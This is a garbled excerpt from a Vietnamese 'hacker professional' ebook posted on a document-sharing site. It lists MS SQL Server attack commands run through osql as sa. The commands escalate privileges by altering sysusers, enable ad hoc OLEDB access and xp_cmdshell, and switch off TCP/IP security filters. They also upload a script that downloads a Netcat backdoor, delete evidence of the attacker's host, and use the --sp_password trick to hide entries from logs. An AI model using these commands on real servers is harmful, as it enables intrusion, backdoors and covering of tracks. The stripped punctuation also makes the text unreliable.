tailieunhanh - Hacker Professional Ebook part 237

Tham khảo tài liệu 'hacker professional ebook part 237', công nghệ thông tin, kỹ thuật lập trình phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả | as select from exec sp_msdropretry xx update sysusers set sid 0x01 where name dbo xx exec sp_msdropretry xx update set xstatus 18 where name BUILTIN ADMINISTRATORS xx exec sp_executesql N drop view --sp_password Thay đổi mức quyền C osql -S -U sa -P -Q exec HKEY_LOCAL_MACHINE SOFTwARE Microsoft MSSQLServer Providers SQLOLEDB AllowInProcess REG_DWORD 1 --sp_password C osql -S -U sa -P -Q exec HKEY_LOCAL_MACHINE SOFTwARE Microsoft MSSQLServer Providers SQLOLEDB DisallowAdhocAccess REG_DWO RD 0--sp_password Xoá bỏ và khôi phục Log và firewall trong MS SQL C osql -S -U sa -P -Q exec HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Ser vices Tcpip Parameters EnableSecurityFilters --sp_password C osql -S -U sa -P -Q exec HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Ser vices Tcpip Parameters EnableSecurityFilters RE G_DWORD 0--sp_password Cho phép sử dụng ALLOW UPDaTeS C osql -S -U sa -P -Q select from openrowset sqloledb server Digital uid BUILTIN Administrators pwd set fmtonly off select 1 exec xp_cmd exec sp_configure allow updates 1 reconfigure with override --sp_password 2. Đưa thêm các thông tin _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ Cộng thêm một quyền quản trị mới Xem tat ca các nhóm của user 3. Đưa backdoor lên server Tạo kịch bản trên server vào thư mục C WINDOWS system32 Kiểm tra xem đã upload kịch bản thành công chưa C osql -S -U sa -P -Q exec dir uds --sp_password Đọc nội dung một file kịch bản C osql -S -U sa -P -Q exec type uds --sp_password Thực hiện kịch bản và Down backdoor Netcat về Xoá kịch bản đi vì trong đó có thông tin về host của mình C osql -S -U sa -P -Q exec del uds --sp_password Chay .